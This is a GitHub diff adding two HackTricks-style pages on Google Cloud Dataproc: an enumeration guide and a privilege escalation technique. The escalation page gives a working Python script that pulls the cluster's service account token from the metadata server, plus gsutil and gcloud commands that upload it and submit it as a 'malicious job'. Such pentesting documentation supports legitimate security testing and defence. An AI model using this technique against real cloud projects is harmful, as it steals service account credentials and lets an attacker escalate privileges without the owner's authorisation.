Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
# GCP Dataproc Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataproc

{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}

### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`

I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below.

#### Steps to exploit

- Place the job script on the GCP Bucket

- Submit a job to a Dataproc cluster.

- Use the job to access the metadata server.

- Leak the service account token used by the cluster.

```python
import requests

metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
try:
response = requests.get(metadata_url, headers=headers, timeout=5)
response.raise_for_status()
token = response.json().get("access_token", "")
print(f"Leaked Token: {token}")
return token
except Exception as e:
print(f"Error fetching metadata token: {e}")
return None

if __name__ == "__main__":
fetch_metadata_token()
```

```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
```

{{#include ../../../banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
# GCP - Dataproc Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Infromation

Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.

Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.

## Components

A Dataproc cluster typically includes:

Master Node: Manages cluster resources and coordinates distributed tasks.

Worker Nodes: Execute distributed tasks.

Service Accounts: Handle API calls and access other GCP services.

## Enumeration

Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.

### Cluster Enumeration

To enumerate Dataproc clusters and retrieve their details:

```
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
```

### Job Enumeration

```
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```

### Privesc

{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}